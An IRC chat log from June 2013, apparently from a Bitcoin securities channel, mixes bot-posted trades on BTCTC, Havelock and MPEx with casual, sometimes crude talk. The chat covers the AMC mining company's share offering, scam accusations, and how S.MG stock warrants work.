00:38:41 [BTCTC] [AMC-PT] 900 @ 0.0025 = 2.25 BTC [+] Jun 28 00:38:47 [BTCTC] [AMC-PT] 60 @ 0.0025 = 0.15 BTC [+] Jun 28 00:39:12 http://25.media.tumblr.com/40f88890a369e0326e57000479f77236/tumblr_mjxh4rxdMB1s1igfwo1_500.jpg Jun 28 00:39:20 I'm loving this tumblr Jun 28 00:43:52 [BTCTC] [AMC-PT] 1500 @ 0.0025 = 3.75 BTC [+] Jun 28 00:44:20 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jun 28 00:45:42 [BTCTC] [ASICMINER-PT] 6 @ 3.404999 = 20.43 BTC [+] Jun 28 00:45:42 [HAVELOCK] [ASICM] 1 @ 0.0331 BTC [+] Jun 28 00:46:03 [BTCTC] [ASICMINER-PT] 4 @ 3.405 = 13.62 BTC [+] Jun 28 00:46:05 [HAVELOCK] [ASICM] 121 @ 0.03125104 = 3.7814 BTC [-] Jun 28 00:46:08 [BTCTC] [ASICMINER-PT] 2 @ 3.407 = 6.814 BTC [+] Jun 28 00:46:13 lol at that last one dub Jun 28 00:46:24 [BTCTC] [ASICMINER-PT] 5 @ 3.409 = 17.045 BTC [+] Jun 28 00:46:35 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jun 28 00:46:50 [BTCTC] [ASICMINER-PT] 1 @ 3.409 BTC [+] Jun 28 00:46:52 OMG THE NEWZZZ! Jun 28 00:46:59 http://www.reddit.com/r/BitcoinStocks/comments/1h7gfg/amc_news/ Jun 28 00:47:02 [BTCTC] [AMC-PT] 800 @ 0.0025 = 2 BTC [+] Jun 28 00:47:03 AMC News : BitcoinStocks Jun 28 00:47:11 [BTCTC] [TAT.VIRTUALMINE] 11 @ 0.00503 = 0.0553 BTC [+] Jun 28 00:47:11 buy Jun 28 00:47:14 buy! Jun 28 00:47:47 [BTCTC] [BASIC-MINING] 1 @ 1.9999 BTC [-] Jun 28 00:48:13 [BTCTC] [AMC-PT] 34 @ 0.0025 = 0.085 BTC [+] Jun 28 00:49:42 [BTCTC] [AMC-PT] 4 @ 0.0025 = 0.01 BTC [+] Jun 28 00:50:31 [BTCTC] [BITVPS] 11 @ 0.001001 = 0.011 BTC [+] Jun 28 00:50:33 [BTCTC] [BITVPS] 1 @ 0.001001 BTC [+] Jun 28 00:50:59 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [+] Jun 28 00:51:51 [BTCTC] [AMC-PT] 5240 @ 0.0025 = 13.1 BTC [+] Jun 28 00:52:21 [BTCTC] [AMC-PT] 40 @ 0.0025 = 0.1 BTC [+] Jun 28 00:53:06 so he's gonna maybe have 25nm chips for Xmas Jun 28 00:54:13 [BTCTC] [AMC-PT] 10000 @ 0.0025 = 25 BTC [+] Jun 28 00:55:37 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jun 28 00:57:09 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jun 28 00:57:10 [HAVELOCK] [HIM] 4 @ 0.2988 = 1.1952 BTC [-] Jun 28 00:57:47 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [+] Jun 28 00:57:57 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.004756 = 0.1189 BTC [-] Jun 28 00:58:21 [BTCTC] [BITVPS] 51 @ 0.001 = 0.051 BTC [-] Jun 28 01:00:19 [HAVELOCK] [HIM] 6 @ 0.2881 = 1.7286 BTC [-] Jun 28 01:00:41 [BTCTC] [AMC-PT] 48 @ 0.0025 = 0.12 BTC [+] Jun 28 01:01:14 [BTCTC] [AMC-PT] 3985 @ 0.0025 = 9.9625 BTC [+] Jun 28 01:02:00 [BTCTC] [DMS.PURCHASE] 93 @ 0.053705 = 4.9946 BTC [-] Jun 28 01:04:14 [BTCTC] [AMC-PT] 18 @ 0.0025 = 0.045 BTC [+] Jun 28 01:04:31 [BTCTC] [AMC-PT] 4000 @ 0.0025 = 10 BTC [+] Jun 28 01:06:01 [BTCTC] [AMC-PT] 110 @ 0.0025 = 0.275 BTC [+] Jun 28 01:06:43 .bait Jun 28 01:06:48 http://25.media.tumblr.com/tumblr_me9ng5epHl1qi0kbpo1_1280.jpg Jun 28 01:07:00 MOM?! Jun 28 01:07:27 [BTCTC] [AMC-PT] 25 @ 0.0025 = 0.0625 BTC [+] Jun 28 01:07:43 ewwww Jun 28 01:08:28 something in this woman reminds me of the hindenburg Jun 28 01:08:32 [BTCTC] [AMC-PT] 25 @ 0.0025 = 0.0625 BTC [+] Jun 28 01:09:11 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jun 28 01:09:17 [BTCTC] [AMC-PT] 11 @ 0.0025 = 0.0275 BTC [+] Jun 28 01:11:45 wow Jun 28 01:11:47 .bait Jun 28 01:11:53 thx ozbot Jun 28 01:12:08 http://25.media.tumblr.com/8995018b818099fa04602227435be94c/tumblr_mf4oziPTY41rlftbao1_1280.jpg Jun 28 01:12:10 that works in private too Jun 28 01:12:18 ok Jun 28 01:12:24 [BTCTC] [TAT.ASICMINER] 4 @ 0.033905 = 0.1356 BTC [+] Jun 28 01:13:33 [BTCTC] [AMC-PT] 2993 @ 0.0025 = 7.4825 BTC [+] Jun 28 01:13:41 [BTCTC] [AMC-PT] 128 @ 0.0025 = 0.32 BTC [+] Jun 28 01:13:59 ;;bcstats Jun 28 01:14:01 Current Blocks: 243659 | Current Difficulty: 1.933925827238668E7 | Next Difficulty At Block: 243935 | Next Difficulty In: 276 blocks | Next Difficulty In About: 1 day, 15 hours, 54 minutes, and 13 seconds | Next Difficulty Estimate: 21197533.2195 | Estimated Percent Change: 9.60882 Jun 28 01:14:10 ;;nethash Jun 28 01:14:11 160443.274495 Jun 28 01:15:08 thickasthieves re asics naw man 2 weeks! Jun 28 01:15:27 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jun 28 01:15:52 [BTCTC] [TAT.ASICMINER] 3 @ 0.033901 = 0.1017 BTC [-] Jun 28 01:16:14 [BTCTC] [ASICMINER-PT] 1 @ 3.4215 BTC [+] Jun 28 01:17:20 >A bit of both. Bitcoin got so many things right, but in order to implement this host of new ideas and improvements, Im afraid we need a whole new coin because an organic update process of the Bitcoin protocol would take ages. Jun 28 01:17:22 jesus fuck Jun 28 01:17:25 https://bitcointalk.org/index.php?topic=244890.0;topicseen Jun 28 01:17:26 have fun Jun 28 01:17:35 Lets make Bitcoin 2.0 and combine all innovations of the past years into one! Jun 28 01:17:52 thx ozbot Jun 28 01:17:54 .bait Jun 28 01:17:58 http://24.media.tumblr.com/1c5f4eb2c55d2243a6d3bfaed6062023/tumblr_mjyrplbB1G1qg7sdjo1_500.jpg Jun 28 01:18:09 "Are you Satoshi? Maybe." ugh, die in a fire Jun 28 01:18:34 [BTCTC] [AMC-PT] 298 @ 0.0025 = 0.745 BTC [+] Jun 28 01:18:52 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jun 28 01:19:14 thank you Jun 28 01:19:18 [HAVELOCK] [SDICE] 2 @ 0.18530201 = 0.3706 BTC [-] Jun 28 01:19:20 [HAVELOCK] [SDICE] 3 @ 0.18530101 = 0.5559 BTC [-] Jun 28 01:19:20 [HAVELOCK] [SDICE] 10 @ 0.1852 = 1.852 BTC [-] Jun 28 01:19:21 [HAVELOCK] [SDICE] 5 @ 0.18511 = 0.9256 BTC [-] Jun 28 01:19:22 [HAVELOCK] [SDICE] 2 @ 0.1851 = 0.3702 BTC [-] Jun 28 01:19:23 [HAVELOCK] [SDICE] 28 @ 0.185 = 5.18 BTC [-] Jun 28 01:19:38 [BTCTC] [DMS.PURCHASE] 7 @ 0.053705 = 0.3759 BTC [-] Jun 28 01:19:40 [HAVELOCK] [ASICM] 29 @ 0.0323 = 0.9367 BTC [+] Jun 28 01:20:10 [BTCTC] [AMC-PT] 9966 @ 0.0025 = 24.915 BTC [+] Jun 28 01:20:18 [HAVELOCK] [ASICM] 90 @ 0.0323 = 2.907 BTC [+] Jun 28 01:20:20 [HAVELOCK] [ASICM] 29 @ 0.032499 = 0.9425 BTC [+] Jun 28 01:20:44 [HAVELOCK] [ASICM] 92 @ 0.032499 = 2.9899 BTC [+] Jun 28 01:20:50 [HAVELOCK] [ASICM] 120 @ 0.0325 = 3.9 BTC [+] Jun 28 01:21:21 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jun 28 01:22:51 [BTCTC] [AMC-PT] 4 @ 0.0025 = 0.01 BTC [+] Jun 28 01:23:32 who operates assbot? Jun 28 01:24:21 kako Jun 28 01:24:35 makes sense Jun 28 01:25:20 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jun 28 01:25:40 but who operates kako? Jun 28 01:25:46 ass Jun 28 01:26:02 [BTCTC] [AMC-PT] 5 @ 0.0025 = 0.0125 BTC [+] Jun 28 01:27:01 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jun 28 01:28:27 [BTCTC] [ASICMINER-PT] 1 @ 3.409 BTC [-] Jun 28 01:28:28 oldest troll on the forum neh ? Jun 28 01:28:47 i am not Jun 28 01:29:12 err i mean NO U Jun 28 01:29:52 [BTCTC] [AMC-PT] 1350 @ 0.0025 = 3.375 BTC [+] Jun 28 01:30:02 https://bitcointalk.org/index.php?topic=244890.0;topicseen <- If Bill Cosby says so, I have no reason to doubt it. Jun 28 01:30:26 CosbyCoin it is. Jun 28 01:32:00 [BTCTC] [DMS.MINING] 1 @ 0.021772 BTC [+] Jun 28 01:33:02 [BTCTC] [AMC-PT] 15 @ 0.0025 = 0.0375 BTC [+] Jun 28 01:33:46 [BTCTC] [ASICMINER-PT] 2 @ 3.380003 = 6.76 BTC [-] Jun 28 01:33:57 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [+] Jun 28 01:34:29 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jun 28 01:34:56 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jun 28 01:35:17 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jun 28 01:35:38 [BTCTC] [BASIC-MINING] 2 @ 1.860197 = 3.7204 BTC [-] Jun 28 01:35:43 [BTCTC] [AMC-PT] 12 @ 0.0025 = 0.03 BTC [+] Jun 28 01:35:53 this gif sums up libertarianism perfectly Jun 28 01:35:56 http://25.media.tumblr.com/fa2e7229c6f6c00dad6bd223b5612d13/tumblr_mjnqln8FtU1s7mpjko1_250.gif Jun 28 01:35:58 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [+] Jun 28 01:36:04 [BTCTC] [AMC-PT] 1333 @ 0.0025 = 3.3325 BTC [+] Jun 28 01:36:15 http://getaddr.bitnodes.io/ Jun 28 01:37:05 1228 nodes in romania Jun 28 01:37:38 45,021 in the USA. China will probably turn the tables shortly. needs a bitbet. Jun 28 01:38:16 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jun 28 01:38:40 and then kslaughter told me it was all a joke. Jun 28 01:39:01 So no news today, he just wanted to get more funds in. Jun 28 01:39:30 https://bitcointalk.org/index.php?topic=158806.msg2598315#msg2598315 sums up my stance on AMC Jun 28 01:39:35 [BTCTC] [AMC-PT] 500 @ 0.0025 = 1.25 BTC [+] Jun 28 01:39:36 [AMC]-The Official Active Mining Cooperative Discussion Jun 28 01:39:41 [BTCTC] [AMC-PT] 6 @ 0.0025 = 0.015 BTC [+] Jun 28 01:39:45 [HAVELOCK] [ASICM] 172 @ 0.032601 = 5.6074 BTC [+] Jun 28 01:39:47 [HAVELOCK] [ASICM] 1 @ 0.0326 BTC [-] Jun 28 01:39:58 C'mon I was just trying to freak out Vbs a bit... Jun 28 01:40:09 deadweasel think in terms of per gdp, and you'll see how fucking backwards the us is on nodes. Jun 28 01:40:15 just saw it xD Jun 28 01:40:19 [BTCTC] [AMC-PT] 150 @ 0.0025 = 0.375 BTC [+] Jun 28 01:40:35 bingo! xD Jun 28 01:40:39 [BTCTC] [AMC-PT] 105 @ 0.0025 = 0.2625 BTC [+] Jun 28 01:40:44 people are scared to run nodes in states? Jun 28 01:41:48 https://bitcointalk.org/index.php?topic=158806.msg2598150#msg2598150 Jun 28 01:41:54 VMC And AMC Are Proud To Announce The "World's Fastest Bitcoin Mining Chip". Jun 28 01:41:57 [AMC]-The Official Active Mining Cooperative Discussion Jun 28 01:42:07 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jun 28 01:42:27 "Each chip holds 20 miner cores, with an expected frequency from 800MHz (16GH/s)" Jun 28 01:42:52 this is huge! Jun 28 01:43:02 better than I thought!!!! :DDDDDD Jun 28 01:43:20 If it's true, we have yet another ASIC miner to deliver somewhere early next year. Jun 28 01:43:26 "AMC has released 2,000,000 shares yesterday at ฿0.0025 on BitFunder, as a headstart for Jun 28 01:43:26 long-term investors" Jun 28 01:43:35 Vbs are you serious? Jun 28 01:43:40 lol Jun 28 01:43:51 yep Jun 28 01:44:19 they are going with eAsic hahahaha Jun 28 01:44:44 is this just people trying to be all s,mpoe on the grounds that why not ? Jun 28 01:44:46 we are on the same boat as Seagate :D Jun 28 01:45:01 for their Momentus XT HDDs Jun 28 01:45:16 didnt seagate die? Jun 28 01:45:23 they made the embedded SDD controlers on eAsic Jun 28 01:45:41 no lol Jun 28 01:45:53 only 2 big HDD manufacturer's left Jun 28 01:45:57 seagate makes the worst Jun 28 01:46:00 Seagate and Western Digital Jun 28 01:46:05 meh Jun 28 01:46:42 MP you should list AMC Jun 28 01:46:52 dont miss out on asicminer AGAIN Jun 28 01:48:08 [BTCTC] [AMC-PT] 888 @ 0.0025 = 2.22 BTC [+] Jun 28 01:48:16 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Jun 28 01:48:50 still have to take the tech details in Jun 28 01:48:57 [BTCTC] [ASICMINER-PT] 2 @ 3.380016 = 6.76 BTC [+] Jun 28 01:49:11 [BTCTC] [AMC-PT] 25 @ 0.0025 = 0.0625 BTC [+] Jun 28 01:49:37 they werent meant to be taken in anally, try there first Jun 28 01:49:46 AMC lol Jun 28 01:49:58 [BTCTC] [AMC-PT] 14 @ 0.0025 = 0.035 BTC [+] Jun 28 01:50:16 [BTCTC] [AMC-PT] 718 @ 0.0025 = 1.795 BTC [+] Jun 28 01:50:28 Bugpowder how many AMC did you buy? Jun 28 01:50:32 0 Jun 28 01:50:40 I thought you like gambling Jun 28 01:50:41 I don't buy mining companies Jun 28 01:50:49 especially fake ones Jun 28 01:50:54 [BTCTC] [AMC-PT] 2690 @ 0.0025 = 6.725 BTC [+] Jun 28 01:50:58 I missed big on asicminer though Jun 28 01:51:01 :( Jun 28 01:51:12 Can't be right 100% of the time. Jun 28 01:51:16 I'm more like 80%. Jun 28 01:51:25 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jun 28 01:51:46 litecoins are up BTW... Jun 28 01:51:52 so suck it! Jun 28 01:52:03 hehe Jun 28 01:52:15 actually s.mg is up Jun 28 01:52:19 yep Jun 28 01:52:22 and guess what Jun 28 01:52:26 i'm gonna do a PT Jun 28 01:52:27 da fuck, most warants are under pruice now ?! Jun 28 01:52:30 within two weeks ?! Jun 28 01:52:55 ? Jun 28 01:52:58 !ticker m s.mg Jun 28 01:52:59 [MPEX:S.MG] 1D: 0.00012451 / 0.00013509 / 0.00015 (70568 shares, 9.53 BTC), 7D: 0.00012451 / 0.00013509 / 0.00015 (70568 shares, 9.53 BTC), 30D: 0.0001 / 0.00010011 / 0.00015 (88288173 shares, 8,838.84 BTC) Jun 28 01:53:16 heavy volume this week Jun 28 01:53:20 kik totally. Jun 28 01:53:21 [BTCTC] [AMC-PT] 590 @ 0.0025 = 1.475 BTC [+] Jun 28 01:53:40 actually all was today. i guess announcement was to the market's liking. Jun 28 01:54:02 link? Jun 28 01:54:14 http://trilema.com/2013/statements-regarding-the-mmorpg-under-development-i-v/ Jun 28 01:54:22 Statements regarding the MMORPG under development (I - V) pe Trilema - Un blog de Mircea Popescu. Jun 28 01:54:24 ThickAsThieves you know, there's stock warrants ouytstanding Jun 28 01:54:46 [MPEX] [S.MPOE] 7829 @ 0.00083478 = 6.5355 BTC [+] Jun 28 01:54:47 [MPEX] [S.MPOE] 6867 @ 0.00083643 = 5.7438 BTC [+] Jun 28 01:56:03 [BTCTC] [CRYPTO-TRADE] 39 @ 0.2 = 7.8 BTC [+] Jun 28 01:56:03 [BTCTC] [CRYPTO-TRADE] 111 @ 0.2 = 22.2 BTC [+] Jun 28 01:57:43 [BTCTC] [CRYPTO-TRADE] 45 @ 0.2 = 9 BTC [+] Jun 28 01:59:58 GO S.MPOE Jun 28 02:00:17 approaching profit Jun 28 02:00:39 you boujght above 83 ?! Jun 28 02:00:42 !t m s.mpoe Jun 28 02:00:43 [MPEX:S.MPOE] 1D: 0.00081023 / 0.00082388 / 0.00083643 (296837 shares, 244.56 BTC), 7D: 0.0007725 / 0.00079641 / 0.00083643 (2407668 shares, 1,917.51 BTC), 30D: 0.0006575 / 0.00076651 / 0.00083643 (59600843 shares, 45,684.89 BTC) Jun 28 02:00:49 when the fuck was it even over 83 Jun 28 02:01:19 [BTCTC] [AMC-PT] 995 @ 0.00249 = 2.4776 BTC [-] Jun 28 02:01:38 nice breakout on mpoe yea Jun 28 02:01:49 [BTCTC] [BASIC-MINING] 1 @ 1.86022 BTC [+] Jun 28 02:01:51 [BTCTC] [BASIC-MINING] 9 @ 1.860219 = 16.742 BTC [-] Jun 28 02:02:04 [BTCTC] [CRYPTO-TRADE] 4 @ 0.2 = 0.8 BTC [+] Jun 28 02:02:05 <@assbot> [BTCTC] [AMC-PT] 995 @ 0.00249 = 2.4776 BTC [-] <- And thus it begins. Jun 28 02:02:57 nothing begins with 2 btc. Jun 28 02:03:10 well outside of forum companies i guess. Jun 28 02:03:11 [BTCTC] [AMC-PT] 100 @ 0.00245 = 0.245 BTC [-] Jun 28 02:03:16 Every billionaire had to earn his first dollar... Jun 28 02:03:23 it was underselled many times Jun 28 02:03:31 hmm now 0.00248 Jun 28 02:03:47 OMG IT'S CRASHING! AMC IS A SCAM! SELL, SELL, SELL! Jun 28 02:04:15 AMC is the Facebook of bitcoin Jun 28 02:04:35 [HAVELOCK] [ASICM] 140 @ 0.03399897 = 4.7599 BTC [+] Jun 28 02:04:44 [HAVELOCK] [ASICM] 7 @ 0.03399897 = 0.238 BTC [+] Jun 28 02:04:59 pankkake, lol i thought the same thing Jun 28 02:05:01 AMC, AMC, AMC, AMC, AM, CAM, CAM, CAMs, CAMs, CAMs, CAM, sCAM, sCAM Jun 28 02:05:27 mp i have questions Jun 28 02:05:30 shoot Jun 28 02:05:32 furuknap aren't you the one with the blog? you should write up an article about AMC Jun 28 02:05:34 okay Jun 28 02:05:43 so S.MG issues stock warrants Jun 28 02:05:46 as noted here: Jun 28 02:05:49 I might, but that would force me to do extensive research on the company. Jun 28 02:05:59 [BTCTC] [AMC-PT] 50 @ 0.00245 = 0.1225 BTC [-] Jun 28 02:06:05 (b) MiniGame solemnly promises and warrants never to issue more shares on any other venue nor in any way to fraudulently dilute existing shareholders at any point in the future. All future share issuance will be made only a) through selling of new shares on MPEx, subject to approval by MPEx, at a price no less than the thirty day average price then current on MPEx ; or b) through issuing Jun 28 02:06:05 of new shares on MPEx in exchange for mergers or acquisitions in all-stock or stock-and-BTC deals ; or c) through the issuing of Special Stock Warrants as defined, written at a price no less than the average S.MG price 24 hours prior to the SSW issuance. Jun 28 02:06:07 I haven't written anything on ASICMiner yet either. That takes presedence. Jun 28 02:06:14 in C) Jun 28 02:06:18 yea Jun 28 02:06:18 [BTCTC] [AMC-PT] 50 @ 0.00245 = 0.1225 BTC [-] Jun 28 02:06:29 that's all the info pertaining to such in contract correct? Jun 28 02:06:52 [BTCTC] [AMC-PT] 200 @ 0.00244 = 0.488 BTC [-] Jun 28 02:06:56 to such what ? Jun 28 02:07:14 [BTCTC] [AMC-PT] 950 @ 0.00248 = 2.356 BTC [+] Jun 28 02:07:19 its all the info related to warrant or stock issuance of all kinds Jun 28 02:07:27 within the contract Jun 28 02:07:28 you have for instance a definition of a stock warrant in the definition section Jun 28 02:07:29 (1) Jun 28 02:07:52 got it Jun 28 02:08:14 you use these warrants as payment for developers and such? Jun 28 02:08:16 lol Jun 28 02:08:20 yes. Jun 28 02:08:27 I guess a 16GH/s chips is not enough Jun 28 02:08:35 that's the idea of stock warrants : to allign the performance of employees/etc with the performance of the stock Jun 28 02:09:07 when they "excercise" them, they are not new shares are they? Jun 28 02:09:14 yes they are. Jun 28 02:09:42 so if you issued me 10,000 warrants at .00015 Jun 28 02:09:47 if you have a stock warrant for 10 shares at 1, you bring 10 btc, get 10 shares. Jun 28 02:09:54 the corp now has 10 more btc and 10 more shares outstanding Jun 28 02:09:54 i cannot excerice them until share price reaches that value Jun 28 02:09:59 and when it does Jun 28 02:10:04 you create new shares Jun 28 02:10:06 you can exercise them any time you wish to pay 10k * 0.00015 Jun 28 02:10:15 bringing the total to 100010000 Jun 28 02:10:24 shares in existence Jun 28 02:10:30 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004756 BTC [-] Jun 28 02:10:31 the latter part, yes. Jun 28 02:11:04 [BTCTC] [ASICMINER-PT] 1 @ 3.39 BTC [+] Jun 28 02:11:34 ok so the person does not get shares Jun 28 02:11:43 merely the right to create them and buy them Jun 28 02:11:53 [BTCTC] [AMC-PT] 1 @ 0.00244 BTC [-] Jun 28 02:12:10 right. at a specified price after a specified date. Jun 28 02:12:32 [BTCTC] [TAT.ASICMINER] 39 @ 0.033001 = 1.287 BTC [-] Jun 28 02:12:38 basically, "if the corp makes nothing you get nothing. work really hard so the stock does well you get something. the harder you work the more you get" Jun 28 02:13:06 interesting Jun 28 02:13:10 yes. Jun 28 02:13:22 are you paying devs or only bartering warrants for hours? Jun 28 02:13:25 it's not a way to pay the lower level people, as their performance isn't so tied with the overal results Jun 28 02:13:31 but it's a good way to pay top level people in any case. Jun 28 02:13:48 but ultimately they must pay a price to even realize that benefit Jun 28 02:13:48 benkay either way. in general i try to conserve capital but it's a matter of having options. Jun 28 02:14:00 do the warrants ever expire? Jun 28 02:14:09 ThickAsThieves if a stock trades at 2 and you have warrants at 1 it's trivial to obtain credit to cash them in Jun 28 02:14:18 indeed Jun 28 02:14:20 [BTCTC] [AMC-PT] 400 @ 0.00247 = 0.988 BTC [+] Jun 28 02:14:22 this is obviously a specialised financial service, which thus creates a new market for people to fill. Jun 28 02:14:29 as in, investment banks for real. Jun 28 02:14:35 [BTCTC] [AMC-PT] 1159 @ 0.00247 = 2.8627 BTC [+] Jun 28 02:14:41 the warrants expire with the corporation that created them. Jun 28 02:14:53 can warrants be reassigned/sold? Jun 28 02:15:01 as any negotiable instrument Jun 28 02:15:09 [MPEX] [S.MPOE] 5733 @ 0.00083643 = 4.7953 BTC [+] Jun 28 02:15:16 [BTCTC] [AMC-PT] 157 @ 0.00244 = 0.3831 BTC [-] Jun 28 02:15:16 if you review the sample text of the two sets so far issued it's upon the holders. Jun 28 02:15:18 [MPEX] [S.MPOE] 9967 @ 0.00083673 = 8.3397 BTC [+] Jun 28 02:15:40 ultimately these do dilute the overall share equity, in wexchange for the price of purchase and receoved services Jun 28 02:15:59 exchange* Jun 28 02:16:06 so in the end... they don't dilute it. Jun 28 02:16:13 looky : corp has 100 hsares, sold at 1 btc each. Jun 28 02:16:21 issues ssw for 100 shares at 1 each. Jun 28 02:16:28 if these get cashed the corp now has 200 shares outstanding Jun 28 02:16:33 and 200 btc in cash Jun 28 02:16:36 so... 1 per share. Jun 28 02:17:24 so will you issue me warrants to run a PT? :) Jun 28 02:17:30 nope Jun 28 02:18:07 so when I mentioned I wanted to do a PT earlier, you immediately mentioned the warrants Jun 28 02:18:14 whhy? Jun 28 02:18:29 i feel like there was a warning in there Jun 28 02:18:35 havent sussed what Jun 28 02:18:46 you went ? Jun 28 02:18:55 i took it to be in relation to my wow ssws already under price Jun 28 02:19:00 oh Jun 28 02:19:02 ok Jun 28 02:19:06 just coincindence Jun 28 02:19:19 which you know... i didn't really expect the price to jump 20% within two weeks when i cut the deal. Jun 28 02:19:34 obviously low volume etc so not really much more than an artefact. Jun 28 02:19:50 people holding on tight to their shares it seems Jun 28 02:19:54 maybe this will lossen them Jun 28 02:19:59 loosen Jun 28 02:20:11 well that's not surprising, tbh. people didn't buy to sell enxt week, this isn't teh forum Jun 28 02:20:35 [BTCTC] [ASICMINER-PT] 2 @ 3.39 = 6.78 BTC [+] Jun 28 02:21:16 [BTCTC] [AMC-PT] 92 @ 0.00244 = 0.2245 BTC [-] Jun 28 02:21:17 okay thanks for the answers, hopefully others learned something too :) Jun 28 02:21:18 [BTCTC] [AMC-PT] 1000 @ 0.00244 = 2.44 BTC [-] Jun 28 02:21:18 [BTCTC] [AMC-PT] 216 @ 0.00244 = 0.527 BTC [-] Jun 28 02:21:26 [BTCTC] [ASICMINER-PT] 2 @ 3.38 = 6.76 BTC [-] Jun 28 02:22:00 [BTCTC] [AMC-PT] 784 @ 0.00244 = 1.913 BTC [-] Jun 28 02:22:02 [BTCTC] [AMC-PT] 1000 @ 0.00244 = 2.44 BTC [-] Jun 28 02:22:09 np np Jun 28 02:22:40 TAT: Yes we are learning a lot. Thanks. Jun 28 02:22:51 noooo Jun 28 02:23:00 we taught AMC how to milk people in new ways Jun 28 02:23:32 well... "people". Jun 28 02:23:48 No milking going on here, building a large mining farm. Jun 28 02:24:08 dude, after gigavps' splendid fiasco large mining farms are how you say scam. Jun 28 02:24:19 [BTCTC] [AMC-PT] 34 @ 0.00242 = 0.0823 BTC [-] Jun 28 02:24:21 [BTCTC] [AMC-PT] 500 @ 0.00245 = 1.225 BTC [+] Jun 28 02:24:49 Like ASICMiners farm? Jun 28 02:25:01 oh, that is different. Jun 28 02:25:11 I will answer for you. Jun 28 02:25:33 [BTCTC] [AMC-PT] 29 @ 0.00245 = 0.0711 BTC [+] Jun 28 02:25:43 this is gonna be good Jun 28 02:25:46 i doubt it's much different. Jun 28 02:28:14 [HAVELOCK] [ASICM] 84 @ 0.033001 = 2.7721 BTC [-] Jun 28 02:28:15 [HAVELOCK] [ASICM] 217 @ 0.033 = 7.161 BTC [-] Jun 28 02:29:00 5.651 TH/s coming by the end of August. Jun 28 02:29:19 dude go talk in #picostocks. Jun 28 02:29:43 that's where the random nobodies with stuck keypads go hang out. Jun 28 02:29:44 You talk in #picostocks Jun 28 02:30:17 [BTCTC] [AMC-PT] 25 @ 0.00245 = 0.0613 BTC [+] Jun 28 02:31:01 http://24.media.tumblr.com/fe7111369a6186fae79405a6dd95ef74/tumblr_mh1nqycUfS1qz9mdso1_400.jpg Jun 28 02:31:07 http://i.imgur.com/cfLZD.gif Jun 28 02:31:09 someone get Amir statt Jun 28 02:31:30 lol Jun 28 02:31:35 [19:29] [AMC] 1000 @ 0.00173000 = 1.73000000 [-] Jun 28 02:32:21 AMC csn you tell us how you determined your most recent pricing for shares? Jun 28 02:32:55 it was 8 when i went to bed then 25 when i woke up Jun 28 02:33:27 and it got to 8 from pumping too if i recall Jun 28 02:34:02 because http://25.media.tumblr.com/ba49f3fa98ecaab51e694dea41b2131f/tumblr_mgzsud8lyL1qzmowao1_500.jpg ? Jun 28 02:34:18 WHAT IS THIS ALL ABOUT PLS? Jun 28 02:34:27 (YOU MAY ANSWER IN SMALL LETTERS. NO BIG DEAL) Jun 28 02:35:17 nsh bitcoin. Jun 28 02:35:37 never even heard of AMC Jun 28 02:35:38 dub wouldja let the guy build his 5th farm in peace ? Jun 28 02:35:46 the joys of avoiding BTC world Jun 28 02:35:53 incidentally, i hope usagi gets with the fducking program and starts SilverFarm, Jun 28 02:36:00 a 3495734985 petabighash farm Jun 28 02:36:09 dafuq is silverfarm? Jun 28 02:36:13 jarpiain jborkl jcpham Jezzz jimmy2k jMyles joeykrim jordandotdev jurov JWU42 Jun 28 02:36:14 o Jun 28 02:36:15 did you get a little butthurt JWU42 ? Jun 28 02:36:23 OK GREAT Jun 28 02:36:33 damn BFL Jun 28 02:36:36 why is everyone with a wikipedia mask retarded Jun 28 02:36:41 wait dont answer that Jun 28 02:36:47 lol shiot ui was about to. Jun 28 02:36:52 [BTCTC] [AMC-PT] 7 @ 0.00245 = 0.0172 BTC [+] Jun 28 02:36:59 JWU42 o, you didn;'t hear ? they delivered Jun 28 02:37:06 [BTCTC] [TAT.ASICMINER] 6 @ 0.03306 = 0.1984 BTC [+] Jun 28 02:37:13 [BTCTC] [BASIC-MINING] 1 @ 1.860069 BTC [-] Jun 28 02:37:16 months ago. to all their customers, except you. Jun 28 02:37:18 or any other customers. Jun 28 02:37:19 oh yeah - I know - just far too late and not to me Jun 28 02:37:20 4-6 weeks and I'm set for lyfe Jun 28 02:37:21 heh Jun 28 02:37:22 [BTCTC] [DMS.MINING] 10 @ 0.021122 = 0.2112 BTC [-] Jun 28 02:37:23 [BTCTC] [DMS.MINING] 33 @ 0.02112 = 0.697 BTC [-] Jun 28 02:37:36 [BTCTC] [ASICMINER-PT] 1 @ 3.4 BTC [+] Jun 28 02:37:44 [BTCTC] [DMS.MINING] 20 @ 0.021004 = 0.4201 BTC [-] Jun 28 02:37:45 [BTCTC] [DMS.MINING] 1 @ 0.021 BTC [-] Jun 28 02:37:47 [BTCTC] [DMS.MINING] 1 @ 0.021 BTC [-] Jun 28 02:37:48 [BTCTC] [DMS.MINING] 1 @ 0.021 BTC [-] Jun 28 02:37:49 [BTCTC] [DMS.MINING] 1 @ 0.021 BTC [-] Jun 28 02:37:51 [BTCTC] [DMS.MINING] 1 @ 0.021 BTC [-] Jun 28 